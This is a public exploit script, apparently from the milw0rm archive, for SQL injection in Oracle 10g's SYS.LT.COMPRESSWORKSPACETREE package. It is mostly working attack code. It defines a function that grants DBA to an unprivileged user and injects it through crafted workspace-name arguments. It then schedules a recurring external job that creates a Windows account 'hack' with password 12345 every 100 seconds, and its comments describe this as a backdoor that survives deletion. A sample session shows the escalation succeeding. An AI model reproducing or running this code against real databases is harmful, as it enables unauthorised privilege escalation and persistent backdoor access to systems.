/*********************************************************/ /*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ /**grant DBA and create new OS user (using scheduller)***/ /*********************************************************/ /***********exploit grant DBA to scott********************/ /***********and execute OS command "net user"*************/ /***********using scheduler*******************************/ /*********************************************************/ /***********tested on oracle 10.1.0.5.0*******************/ /*********************************************************/ /*********************************************************/ /* Date of Public EXPLOIT: January 6, 2009 */ /* Written by: Alexandr "Sh2kerr" Polyakov */ /* email: Alexandr.Polyakov@dsec.ru */ /* site: http://www.dsecrg.ru */ /* http://www.dsec.ru */ /*********************************************************/ /*Original Advisory: */ /*Esteban Martinez Fayo [Team SHATTER ] */ /*Date of Public Advisory: November 11, 2008 */ /*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ /*********************************************************/ select * from user_role_privs; CREATE OR REPLACE FUNCTION Z return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; COMMIT; RETURN 'Z'; END; / exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z'); /* We create backdored OS user "hack" with password 12345 using External Job's */ /* Note that in this method new user will be created every 100 seconds */ /* so if administrator find it and will try to delete it */ /* user hack will be created again. So it is also a simle backdoor */ BEGIN DBMS_SCHEDULER.CREATE_PROGRAM ( program_name=> 'MyCmd', program_type=> 'EXECUTABLE', program_action =>’cmd /c "net user hack 12345 /add"’, enabled=> TRUE); END; / BEGIN DBMS_SCHEDULER.CREATE_JOB ( job_name=> 'extjobexec', program_name=> 'MyCmd', repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', enabled=> TRUE, comments=> 'create backdoor user every 100 seconds'); END; / /* here we can paste any OS command for example create new user */ exec dbms_scheduler.run_job('extjobexec'); / select * from user_role_privs; --------------------------------------------------------------------------------- -----------------------------EXAMPLE OF EXPLOITATION ---------------------------- --------------------------------------------------------------------------------- SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- OUTLN CONNECT NO YES NO OUTLN RESOURCE NO YES NO SQL> CREATE OR REPLACE FUNCTION X return varchar2 2 authid current_user as 3 pragma autonomous_transaction; 4 BEGIN 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; 6 COMMIT; 7 RETURN 'x'; 8 END; 9 / Function created. SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x') PL/SQL procedure successfully completed. SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x') PL/SQL procedure successfully completed. SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- OUTLN CONNECT NO YES NO OUTLN DBA NO YES NO OUTLN RESOURCE NO YES NO SQL> // milw0rm.com [2009-01-06]